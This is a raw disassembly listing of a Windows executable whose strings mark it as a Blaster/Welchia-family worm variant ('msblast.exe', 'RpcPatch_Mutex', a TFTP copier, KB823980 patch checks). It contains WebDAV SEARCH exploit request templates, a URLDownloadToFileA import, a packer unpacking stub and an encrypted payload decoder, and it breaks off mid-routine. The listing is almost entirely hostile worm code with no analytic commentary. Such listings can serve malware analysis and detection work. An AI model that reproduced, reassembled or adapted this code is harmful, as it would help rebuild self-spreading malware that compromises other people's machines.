aDllhost_exe db 'DLLHOST.EXE',0 ; DATA XREF: sub_401660+4D�o
; sub_401C80+EC�o
aBrowser db 'Browser',0 ; DATA XREF: sub_401660+48�o
aSWinsDllhost_e db '%s\wins\DLLHOST.EXE',0 ; DATA XREF: sub_401660+24�o
aSNOZQ db '%s -n -o -z -q',0 ; DATA XREF: sub_401780:loc_4018DC�o
align 4
dword_4061A8 dd 53637052h dword_4061AC dd 69767265h dword_4061B0 dd 61506563h dword_4061B4 dd 652E6B63h word_4061B8 dw 6578h ; DATA XREF: sub_401780+102�r
byte_4061BA db 0 ; DATA XREF: sub_401780+10D�r
align 4
dword_4061BC dd 74737973h, 32336D65h, 3Eh ; sub_401C80+8E�o ...
aTimeoutOccurre db 'Timeout occurred',0 ; DATA XREF: sub_401B90+95�o
align 4
aTransferSucces db 'Transfer successful',0 ; DATA XREF: sub_401B90+86�o
aTftpd_exe db 'TFTPD.EXE',0 ; DATA XREF: sub_401C80+148�o
align 4
aTftpd_exe_0 db 'tftpd.exe',0 ; DATA XREF: sub_401C80+135�o
align 4
aDllhost_exe_0 db 'dllhost.exe',0 ; DATA XREF: sub_401C80+103�o
aMicrosoftWindo db 'Microsoft Windows',0 ; DATA XREF: sub_401C80+77�o
align 4
aMicrosoft_com db 'microsoft.com',0 ; DATA XREF: sub_401E80�o
align 4
word_406238 dw 0A0Dh ; DATA XREF: sub_401F30+17E�r
byte_40623A db 0 ; DATA XREF: sub_401F30+185�r
align 4
aHttp1_1Host127 db ' HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_401F30+100�o
db 'Host: 127.0.0.1',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-length: 377',0Dh,0Ah
db 0Dh,0Ah
db 'YXYX',0
aSearch db 'SEARCH /',0 ; DATA XREF: sub_401F30+A�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4022A0+1C�o
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980',0
; DATA XREF: sub_402390+2D�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Updates\Windows XP\SP1\KB823980',0
; DATA XREF: sub_402390:loc_4023AC�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980',0
; DATA XREF: sub_402390+8�o
align 4
aManagesNetwork db 'Manages network configuration by updating DNS names IP address.',0
; DATA XREF: sub_4023E0+D1�o
aSWinsS db '%s\wins\%s',0 ; DATA XREF: sub_4023E0+4D�o
align 4
aDSWins db '-d%s\wins',0 ; DATA XREF: sub_402540+33�o
align 4
aRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: sub_4027B0�o
align 4
aSMsblast_exe db '%s\msblast.exe',0 ; DATA XREF: sub_402A00+63�o
align 4
aMsblast db 'msblast',0 ; DATA XREF: sub_402A00+8�o
a411 db '411',0 ; DATA XREF: sub_402C40+20A�o
aSearchHttp1_1H db 'SEARCH / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+19E�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
aServerMicrosof db 'Server: Microsoft-IIS/5.0',0 ; DATA XREF: sub_402C40+13F�o
align 4
aSSS db '%s%s%s',0 ; DATA XREF: sub_402C40+BA�o
align 4
dword_406414 dd 1 align 10h
dword_406420 dd 0 ; sub_402B20+CA�r
dword_406424 dd 0 ; sub_401F30+50�r ...
dword_406428 dd 0 ; sub_402170+100�w
dword_40642C dd 0 ; sub_4020E0+13�r
dword_406430 dd 10h dup(0) ; sub_402AB0+3F�o ...
dword_406470 dd 0 ; sub_402130+35�w ...
align 8
dword_406478 dd 0 align 10h
dword_406480 dd 0 ; sub_402170+C7�w
dd 1Bh dup(0)
dword_4064F0 dd 0 ; sub_402170+D3�w
dword_4064F4 dd 0 ; sub_402170+DF�w
dd 0Bh dup(0)
dword_406524 dd 0 ; sub_402170+EF�w
dword_406528 dd 0 ; sub_402170+F9�w
dd 5 dup(0)
dword_406540 dd 0 ; sub_402170+11E�w
dd 2Eh dup(0)
dword_4065FC dd 0 ; sub_402170+124�w
dd 74h dup(0)
dword_4067D0 dd 0 dword_4067D4 dd 0 dword_4067D8 dd 0 dword_4067DC dd 0 dword_4067E0 dd 0B3h dup(0) dword_406AAC dd 0Fh dup(0) dword_406AE8 dd 146h dup(0) seg000 ends
; Section 2. (virtual address 00007000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00007000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg001 segment para public 'CODE' use32
assume cs:seg001
;org 407000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_407000 dd 11Ch dup(0) dword_407470 dd 0 ; sub_4020E0+33�r
dword_407474 dd 0 ; sub_402170+10A�w
dword_407478 dd 8 dup(0) ; sub_401210+43�o ...
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_4011C0+14�o
; sub_4015E0+14�o ...
dd 3Dh dup(0)
dword_4075A0 dd 0 ; sub_401280+9C�r ...
dword_4075A4 dd 0 ; sub_401470+136�r ...
dword_4075A8 dd 20h dup(0) ; sub_401C80+18C�o
dword_407628 dd 20h dup(0) ; sub_401C80+15C�o
dword_4076A8 dd 0 ; seg000:00402932�w
dword_4076AC dd 0 dword_4076B0 dd 0 dword_4076B4 dd 0 dword_4076B8 dd 0 dword_4076BC dd 0FFFFFFFFh dword_4076C0 dd 0FFFFFFFFh dword_4076C4 dd 0 dd 24Eh dup(0)
dd 0E0h, 3060h, 74654701h, 7473614Ch, 6F727245h, 49010072h
dd 7265746Eh, 6B636F6Ch, 65446465h, 6D657263h, 746E65h
dd 6F6C4701h, 416C6162h, 636F6C6Ch, 6C470100h, 6C61626Fh
dd 65657246h, 704F0100h, 72506E65h, 7365636Fh, 47010073h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 53010041h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 47010041h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 6D6E5501h
dd 69567061h, 664F7765h, 656C6946h, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 6F4C0100h, 416C6163h, 636F6C6Ch
dd 6F4C0100h, 466C6163h, 656572h, 74654701h, 73726556h
dd 6E6F69h, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 47010073h
dd 454F7465h, 50434Dh, 74654701h, 74737953h, 65446D65h
dd 6C756166h, 49434C74h, 47010044h, 6F4D7465h, 656C7564h
dd 656C6946h, 656D614Eh, 54010041h, 696D7265h, 6574616Eh
dd 636F7250h, 737365h, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 6F430100h, 69467970h, 41656Ch
dd 74654701h, 61636F4Ch, 6D69546Ch, 45010065h, 50746978h
dd 65636F72h, 1007373h, 54746547h, 436B6369h, 746E756Fh
dd 72430100h, 65746165h, 65726854h, 1006461h, 65656C53h
dd 46010070h, 43656572h, 6F736E6Fh, 100656Ch, 53746547h
dd 65747379h, 7269446Dh, 6F746365h, 417972h, 65724301h
dd 54657461h, 686C6F6Fh, 33706C65h, 616E5332h, 6F687370h
dd 50010074h, 65636F72h, 32337373h, 73726946h, 50010074h
dd 65636F72h, 32337373h, 7478654Eh, 6C430100h, 4865736Fh
dd 6C646E61h, 43010065h, 74616572h, 6F725065h, 73736563h
dd 44010041h, 74656C65h, 6C694665h, 4165h, 0EDh, 3000h
dd 61684301h, 5365676Eh, 69767265h, 6F436563h, 6769666Eh
dd 1004132h, 72657551h, 72655379h, 65636976h, 666E6F43h
dd 41326769h, 74530100h, 53747261h, 69767265h, 416563h
dd 6C654401h, 53657465h, 69767265h, 1006563h, 69676552h
dd 72657473h, 76726553h, 43656369h, 486C7274h, 6C646E61h
dd 417265h, 74655301h, 76726553h, 53656369h, 75746174h
dd 53010073h, 74726174h, 76726553h, 43656369h, 446C7274h
dd 61707369h, 65686374h, 1004172h, 72657551h, 72655379h
dd 65636976h, 74617453h, 1007375h, 72657551h, 72655379h
dd 65636976h, 666E6F43h, 416769h, 61684301h, 5365676Eh
dd 69767265h, 6F436563h, 6769666Eh, 41010041h, 73756A64h
dd 6B6F5474h, 72506E65h, 6C697669h, 73656765h, 704F0100h
dd 43536E65h, 616E614Dh, 41726567h, 72430100h, 65746165h
dd 76726553h, 41656369h, 6C430100h, 5365736Fh, 69767265h
dd 61486563h, 656C646Eh, 704F0100h, 65536E65h, 63697672h
dd 1004165h, 4F676552h, 4B6E6570h, 78457965h, 52010041h
dd 6C436765h, 4B65736Fh, 1007965h, 6E65704Fh, 636F7250h
dd 54737365h, 6E656B6Fh, 6F4C0100h, 70756B6Fh, 76697250h
dd 67656C69h, 6C615665h, 416575h, 0FA00h, 305000h, 63490100h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 49010065h, 43706D63h
dd 74616572h, 6C694665h, 49010065h, 53706D63h, 45646E65h
dd 6F6863h, 10300h, 30F000h, 78650100h, 1007469h, 7063585Fh
dd 6C694674h, 726574h, 675F5F01h, 616D7465h, 72616E69h
dd 1007367h, 696E695Fh, 72657474h, 7301006Dh, 74737274h
dd 73010072h, 646E6172h, 3F3F0100h, 41594032h, 49584150h
dd 1005A40h, 5F705F5Fh, 6E695F5Fh, 6E657469h, 5F010076h
dd 7465735Fh, 72657375h, 6874616Dh, 727265h, 64615F01h
dd 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh, 6D6D6F63h
dd 65646Fh, 72707301h, 66746E69h, 74730100h, 68637272h
dd 5F010072h, 5F5F705Fh, 646F6D66h, 5F010065h, 7465735Fh
dd 7070615Fh, 7079745Fh, 5F010065h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 6F635F01h, 6F72746Eh, 70666Ch, 78655F01h
dd 1007469h, 40333F3Fh, 50584159h, 5A405841h, 61720100h
dd 100646Eh, 7274735Fh, 706D6369h, 10E0000h, 319C0000h
dd 55010000h, 6F444C52h, 6F6C6E77h, 6F546461h, 656C6946h
dd 19000041h, 48000001h, 1000031h, 74697845h, 646E6957h
dd 4573776Fh, 24000078h, 50000001h, 0FF000031h, 4FF0017h
dd 39FF00h, 0FF000CFFh, 15FF0034h, 13FF00h, 0FF0010FFh
dd 9FF0003h, 2FF00h, 0FF0074FFh, 1FF000Dh, 8FF00h, 0FF0073FFh
dd 0BFF000Eh, 0
dd 45500000h, 14C0000h, 20080003h, 9A08h, 0
dd 0E00000h, 10B010Fh, 30000006h, 40000000h, 0
dd 2FCC0000h, 10000000h, 40000000h, 0
dd 10000040h, 10000000h, 40000h, 0
dd 40000h, 0
dd 80000000h, 10000000h, 0
dd 30000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 41B40000h, 0A00000h, 14h dup(0)
dd 40000000h, 1A40000h, 6 dup(0)
dd 742E0000h, 747865h, 213A0000h, 10000000h, 30000000h
dd 10000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 9B00000h, 40000000h
dd 10000000h, 40000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 26C80000h, 50000000h, 20000000h
dd 50000000h, 3 dup(0)
dd 400000h, 7000C000h, 43F80000h, 2 dup(755E0000h), 8DD71262h
dd 0CECF74AAh, 0BA612C8h, 0C097F36Bh, 91ED3F6Ah, 5E1AC6C0h
dd 0D97BDC9Dh, 70B7FFFEh, 5412C707h, 9ABDDF12h, 9A78485Ah
dd 0FF50AA58h, 850D9112h, 7B5ADFFFh, 0E9B7858h, 63120853h
dd 5F1A6E12h, 0F3491297h, 37DAC09Ah, 0ED71DCD8h, 60940C6Eh
dd 0C365CE66h, 0FFFEEF68h, 75F812F9h, 0F36D12DDh, 9D10C089h
dd 0C9627B17h, 0F398F300h, 0BDB2FF9Bh, 216D226Dh, 2A1C710h
dd 5EFFD9A5h, 9898B5DFh, 0FEC5BFFBh, 0C989DE14h, 2159AACFh
dd 0A5CE1403h, 0F4FA9B5Eh, 0D9CB99FDh, 7EDFB9BBh, 9E5E71CEh
dd 5E9B499Bh, 0FA9DDEh, 13CACE4Ch, 6EBADFDAh, 1B650361h
dd 1C353275h, 0C860EC59h, 0CBEDFF78h, 0C34B11DFh, 777B32C0h
dd 669A715Ah, 0EDFCDE00h, 0FAF6EBC9h, 6F7BBFD8h, 0EBFDFDFFh
dd 99EAEAFCh, 0EDF805DAh, 0D80D11FCh, 0F0E1DC99h, 0DDBFDBEDh
dd 13F1CDDCh, 4F6D563h, 0EBFBF0D5h, 17E0EBF8h, 0BB797FEEh
dd 0C6ABEAFDh, 6399ABAAh, 0F229CAD8h, 0F6FAEDFCh, 0FAFCF7F7h
dd 6FB58D24h, 0F6F5FADFh, 99143AEAh, 0D23F2057h, 0B72D20C8h
dd 0C2A88h, 81268002h, 0C8C28F7h, 2F84BF07h, 4DD137F1h
dd 642079D2h, 61636C6Ch, 745C65C2h, 0D1BFA37Dh, 2E347466h
dd 20657865h, 5C732877h, 0E9987673h, 6F14B12Bh, 0DE0A10D3h
dd 0F3D01C13h, 4C4C44FFh, 54534F48h, 4558452Eh, 0EEF9149Ah
dd 544985BDh, 500B5338h, 68637461h, 0C5B656F7h, 495A7241h
dd 0EDFFB300h, 3D3D9F2Fh, 0D2CB00CAh, 0DAD3D3D2h, 2FDCDBDAh
dd 62E607D6h, 47773463h, 68525445h, 20FE2D8Bh, 50545448h
dd 6031D32Fh, 6F46A341h, 7495D054h, 29E8203Ah, 85A8DB07h
dd 0A2C0980h, 716D2D78h, 6278F2D8h, 10707469h, 1667AF6Ah
dd 0B8767DBh, 2F2A0C70h, 0B355412Ah, 0F6DD5B6Fh, 14412D72h
dd 0ED4D456Eh, 2F616F69h, 0E154AD34h, 28202E42h, 0FEBE350Eh
dd 0B446A16Dh, 53183B06h, 35204549h, 0BF17352Eh, 5709DB51h
dd 73773A94h, 0FC383920h, 5CD7B685h, 0C3359948h, 0DA67430Bh
dd 6EA190CDh, 4B116E30h, 15A89465h, 7B53D46Ah, 0FA35177Fh
dd 0DF0467B2h, 20492000h, 0D6EA5B7Ah, 6D2019BDh, 766E179h
dd 62222026h, 6D42B90Bh, 7E293A7Bh, 765F2000h, 2EC76E78h
dd 584315B5h, 4E116E61h, 6563546Fh, 5D0B7368h, 34DC3220h
dd 4220A032h, 605B36EFh, 6CBB416Dh, 0CC8F3866h, 6FF6EDB5h
dd 7A437272h, 76677D68h, 88686F36h, 0B1480C22h, 0EA982D74h
dd 2F3A765Eh, 0AE6EBE2Fh, 85B96D80h, 0CA56A856h, 712E8C38h
dd 93FB51BDh, 2F362F16h, 5352F39h, 3764375Ah, 1BFC2FF5h
dd 62662D59h, 342D6137h, 622D39B7h, 2D366531h, 2AB7D1B0h
dd 36627A3Fh, 326C6632h, 0A105DFC2h, 30980C27h, 38424B2Dh
dd 0C0153332h, 8B76F0Eh, 4B253878h, 73B1524Fh, 0A5BDB52Fh
dd 662F386Fh, 37C83805h, 72FD3631h, 2D31FDD9h, 33626438h
dd 35346673h, 35613037h, 2BE46236h, 3904BDACh, 73803864h
dd 0F6544843h, 322266B7h, 31380531h, 66643063h, 5ADED53Eh
dd 323737FBh, 4C037362h, 0F6323139h, 3D4DB590h, 65536254h
dd 0DF731839h, 5376113Ch, 312F30E7h, 64663130h, 2F6B6D64h
dd 663034FFh, 6366652Dh, 64333335h, 0EC321CF1h, 856B6DB0h
dd 65175C34h, 73350534h, 0AF90891Bh, 0EE554E45h, 742B6D33h
dd 33657577h, 0C5325C31h, 0FF4735EAh, 7C685706h, 335B73DAh
dd 65313865h, 8353462h, 35E49C21h, 50586634h, 639B0CDh
dd 47335B42h, 43723641h, 33ED0D6Bh, 355B4864h, 5DB63730h
dd 6361F280h, 32336932h, 840733ECh, 38D8461Dh, 0C773CD73h
dd 615DD68Eh, 2B033501h, 0BB433064h, 3379470Eh, 44383361h
dd 35EC344Dh, 860AC265h, 6564590Bh, 0EB73EE02h, 53B90A18h
dd 5624339h, 46ED6B5Ah, 0D666329h, 35086C64h, 0E7EB4075h
dd 2D6D7338h, 0AC233539h, 1D252B70h, 73F16633h, 92D03FFh
dd 207100CDh, 2520692Dh, 23C2073h, 6567F203h, 6E202074h
dd 80435653h, 2F96CAC0h, 8062D629h, 0CF9E20C0h, 0EB2DBE24h
dd 6B2677D6h, 5338A920h, 0F0726168h, 2BDD80D6h, 6C0067h
dd 435444ECh, 4CD0246Fh, 13FA4207h, 256EF6Ah, 49572BC6h
dd 0A158534Eh, 7AD03580h, 41770046h, 6E02B258h, 4B60F372h
dd 0B6CB2C1Bh, 6E2DB71Bh, 717A6F02h, 18DB5D6Dh, 762A532Fh
dd 6B5F50ECh, 9ED5A36Eh, 78797358h, 633E2CECh, 817B605Ah
dd 6F65BC54h, 0F36FE875h, 31EDB475h, 6365EDD8h, 55617254h
dd 6ED83566h, 752D2C1Dh, 750A7309h, 3046136Ch, 1D36F730h
dd 0A31F6144h, 96E08604h, 0D0CFE320h, 370425C0h, 4D0FE31Fh
dd 0B9706020h, 0E706EC6Ah, 371B6C1Ah, 4710011Ch, 0BBC0CDE0h
dd 542DEF74h, 0A9E7079h, 6D2F7478h, 4E95976Fh, 67046C17h
dd 33196874h, 683F6FC2h, 58590641h, 45530001h, 0ADC55241h
dd 0C2835ED0h, 0CE7DECBBh, 1F0AD685h, 0F683504Bh, 0EC9DC52Eh
dd 4F136DB6h, 452257BCh, 555CA05Ch, 0B6850618h, 3A4F61C0h
dd 0BC61D879h, 500941D1h, 455C32h, 0C845AF33h, 0A793114h
dd 357496AFh, 0CB6E4F35h, 40266C60h, 634B6E1Ch, 0C7C1D766h
dd 8E6769C2h, 0C6204E61h, 366E4575h, 20518EC7h, 6D2B1044h
dd 30205049h, 1C970D19h, 2E9D7264h, 580F2507h, 2D70DB04h
dd 5F2B0D64h, 0C4B0754Dh, 7B480C31h, 617A736Dh, 8360A970h
dd 0D10C00AEh, 96893131h, 9B439212h, 6B276E34h, 24411EDh
dd 492DDA0Eh, 0D68518BDh, 0B41A5349h, 422001D3h, 4030C80h
dd 88580101h, 42A8CB00h, 0A5FAE052h, 0FC0B1432h, 74654701h
dd 0FB60054Ch, 724544ADh, 0D726F72h, 4A00A549h, 6C72FFC1h
dd 656B636Fh, 63654464h, 0B7EE6152h, 1123BBE6h, 416C6162h
dd 400C186Ch, 46DB6EDBh, 4F0B651Bh, 38501F70h, 1CC6005Fh
dd 0B0464964h, 72747441h, 0F6CB256Fh, 74756269h, 27534113h
dd 0F6FB9B82h, 75646F4Dh, 6E614815h, 55111B64h, 0F7B6D06Eh
dd 695693B7h, 664F7765h, 5D43102Dh, 2AAFB09h, 9441F676h
dd 0C936B25Eh, 104C6E49h, 22C0B93h, 5D92CDF4h, 330BE156h
dd 450F6701h, 24437878h, 1FD8C03Dh, 454FB358h, 950434Dh
dd 0DDA17B53h, 66F7574Eh, 43149C61h, 0BDAB4449h, 97017F7Dh
dd 0AD6D614Eh, 696D5254h, 9ED0B06Eh, 57459FCCh, 3EE66961h
dd 0B780B553h, 4F25E202h, 36486A62h, 0C3C20D7Bh, 0A1783539h
dd 3CCDB096h, 8B6D6954h, 0DD158069h, 0D9B5B7B3h, 0F7D3752Ch
dd 64066854h, 0C825B5Eh, 670B13Ch, 5C3B2FD7h, 6F733E02h
dd 7269A619h, 73764DBFh, 41797466h, 68216F36h, 33706C65h
dd 0DBEE60B5h, 709D5332h, 506F6873h, 1C2B1267h, 789A158h
dd 6F594E0Fh, 0C2C20B36h, 4586733Dh, 82B5ACD4h, 1508554Bh
dd 6DB7C20Fh, 0ED00F152h, 2E68250Ch, 7D6567h, 43930167h
dd 0A7E432E9h, 512CDB6Ch, 15791175h, 72617453h, 4B377B74h
dd 700F5116h, 69676552h, 31B671CAh, 233672ACh, 85728B6Ch
dd 399B05DDh, 75744417h, 50134C73h, 442BBE82h, 21651E80h
dd 7F2E3D9Bh, 86FC9330h, 0BF417604h, 6A644141h, 31747375h
dd 62A34059h, 46127377h, 53DF9E02h, 6872DF43h, 5961D86Ch
dd 0BA0E3FD0h, 0D9B2DCFEh, 10E32133h, 9079654Bh, 823DEC5Ch
dd 3D0F330Eh, 9623DB92h, 7581C779h, 61E69F70h, 75325663h
dd 4950FA7Ch, 12F66963h
dd 0B3706DC2h, 46389410h, 0F37B5B0h, 9D451B7Ch, 0B72CF1CDh
dd 0F0010337h, 68057265h, 5FF4E19Dh, 8E706358h, 5F5F0C72h
dd 8B476EB5h, 6772C80Ah, 0CE085FE9h, 22AEB42Dh, 70A6D18h
dd 0FB070272h, 72B9BFFEh, 3F3F0664h, 41594032h, 49584150h
dd 70365A40h, 0B6F68602h, 76652C58h, 116B8B0Eh, 3773433Eh
dd 61578882h, 6082364Ah, 64665FEDh, 6D392EC4h, 95C15A36h
dd 0D9AF9D44h, 0CC1B66E6h, 1262C510h, 0BD1D661Fh, 4B362DB7h
dd 7411703Eh, 770F7079h, 0B5A22EC6h, 13685FC7h, 0A3771133h
dd 39590215h, 1D7066E5h, 0BDD35CF6h, 58339DD3h, 2CB19D9Eh
dd 476D5C18h, 0E00086Dh, 0D9BC1598h, 5255319Ch, 0E99F444Ch
dd 6A518374h, 481C19D2h, 9B5B390h, 170AE0C1h, 0B6596524h
dd 17FF504Dh, 0C390402h, 96596596h, 10131534h, 96590903h
dd 74025965h, 0F208010Dh, 73659604h, 50710B0Eh, 92FE8045h
dd 3014CFFh, 8200800h, 0B010F9Ah, 41660601h, 4052C6CFh
dd 0BE2FCC13h, 0F7D9E764h, 0F10040Fh, 5B070004h, 17B67406h
dd 0CB0C3180h, 10EC0DE0h, 0BA360607h, 0B4CB2101h, 0A4A2A041h
dd 8C2B829h, 85F02E26h, 79DB06Ch, 3090213Ah, 8F052D98h
dd 2E609501h, 29611072h, 53B9309Bh, 6A0309B0h, 0DEECD3BDh
dd 3C262E40h, 75026C8h, 94E1B6E5h, 0EB00C027h, 5E0343F8h
dd 75h, 4800000h, 0FF00h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_407000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_409082
; ---------------------------------------------------------------------------
align 8
loc_409078: ; CODE XREF: seg001:loc_409089�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40907E: ; CODE XREF: seg001:00409116�j
; seg001:0040912D�j
add ebx, ebx
jnz short loc_409089
loc_409082: ; CODE XREF: seg001:00409070�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_409089: ; CODE XREF: seg001:00409080�j
jb short loc_409078
mov eax, 1
loc_409090: ; CODE XREF: seg001:0040909F�j
; seg001:004090AA�j
add ebx, ebx
jnz short loc_40909B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40909B: ; CODE XREF: seg001:00409092�j
adc eax, eax
add ebx, ebx
jnb short loc_409090
jnz short loc_4090AC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_409090
loc_4090AC: ; CODE XREF: seg001:004090A1�j
xor ecx, ecx
sub eax, 3
jb short loc_4090C0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_409132
mov ebp, eax
loc_4090C0: ; CODE XREF: seg001:004090B1�j
add ebx, ebx
jnz short loc_4090CB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090CB: ; CODE XREF: seg001:004090C2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4090D8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090D8: ; CODE XREF: seg001:004090CF�j
adc ecx, ecx
jnz short loc_4090FC
inc ecx
loc_4090DD: ; CODE XREF: seg001:004090EC�j
; seg001:004090F7�j
add ebx, ebx
jnz short loc_4090E8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090E8: ; CODE XREF: seg001:004090DF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4090DD
jnz short loc_4090F9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4090DD
loc_4090F9: ; CODE XREF: seg001:004090EE�j
add ecx, 2
loc_4090FC: ; CODE XREF: seg001:004090DA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40911C
loc_40910D: ; CODE XREF: seg001:00409114�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40910D
jmp loc_40907E
; ---------------------------------------------------------------------------
align 4
loc_40911C: ; CODE XREF: seg001:0040910B�j
; seg001:00409129�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40911C
add edi, ecx
jmp loc_40907E
; ---------------------------------------------------------------------------
loc_409132: ; CODE XREF: seg001:004090BC�j
pop esi
mov edi, esi
mov ecx, 5Dh
loc_40913A: ; CODE XREF: seg001:00409141�j
; seg001:00409146�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40913F: ; CODE XREF: seg001:00409164�j
cmp al, 1
ja short loc_40913A
cmp byte ptr [edi], 1
jnz short loc_40913A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_40913F
lea edi, [esi+7000h]
loc_40916C: ; CODE XREF: seg001:0040918E�j
mov eax, [edi]
or eax, eax
jz short loc_4091B7
mov ebx, [edi+4]
lea eax, [eax+esi+9000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+90A0h]
xchg eax, ebp
loc_409189: ; CODE XREF: seg001:004091AF�j
mov al, [edi]
inc edi
or al, al
jz short loc_40916C
mov ecx, edi
jns short near ptr loc_40919A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40919A: ; CODE XREF: seg001:00409192�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+90A4h]
or eax, eax
jz short loc_4091B1
mov [ebx], eax
add ebx, 4
jmp short loc_409189
; ---------------------------------------------------------------------------
loc_4091B1: ; CODE XREF: seg001:004091A8�j
call dword ptr [esi+90A8h]
loc_4091B7: ; CODE XREF: seg001:00409170�j
popa
jmp loc_402FCC
; ---------------------------------------------------------------------------
align 1000h
seg001 ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00016000 ( 90112.)
; Section size in file : 00011600 ( 71168.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg002 segment para public 'CODE' use32
assume cs:seg002
;org 40A000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 3 dup(0)
dd 0A0E0h, 0A0A0h, 3 dup(0)
dd 0A0EDh, 0A0B0h, 3 dup(0)
dd 0A0FAh, 0A0B8h, 3 dup(0)
dd 0A103h, 0A0C0h, 3 dup(0)
dd 0A10Eh, 0A0C8h, 3 dup(0)
dd 0A119h, 0A0D0h, 3 dup(0)
dd 0A124h, 0A0D8h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 76D64B79h, 0
dd 77C39E7Eh, 0
dd 42D779A3h, 0
dd 7E45A045h, 0
dd 71AB2BF4h, 0
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 41h, 44h, 56h
db 41h ; A
db 50h, 49h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 4349h
db 4Dh ; M
db 50h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 0, 4Dh
db 53h ; S
db 56h, 43h, 52h
db 54h ; T
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 7275h
db 6Ch ; l
db 6Dh, 6Fh, 6Eh
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
db 55h, 53h, 45h
db 52h ; R
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 57h ; W
db 53h, 32h, 5Fh
db 33h ; 3
db 32h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 2 dup(0)
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
db 0
align 2
aIcmpsendecho db 'IcmpSendEcho',0
align 4
aExit db 'exit',0
align 2
aUrldownloadtof db 'URLDownloadToFileA',0
align 2
aExitwindowsex db 'ExitWindowsEx',0
dd 18h dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_40A217
call sub_40A256
push dword ptr fs:0
pop ebp
add ebp, 8
; =============== S U B R O U T I N E =======================================
sub_40A217 proc near ; CODE XREF: seg002:0040A203�p
sub edi, edi
sub ecx, ecx
mov cl, 64h
loc_40A21D: ; CODE XREF: sub_40A217+8�j
inc edi
dec ecx
jnz short loc_40A21D
call sub_40A253
add ebx, 3Dh
push ebx
mov ecx, 243Ch
loc_40A232: ; CODE XREF: sub_40A217+2A�j
xchg al, [ebx]
sub ax, di
mov [ebx], al
add ebx, 1
inc edi
dec ecx
cmp ecx, 0
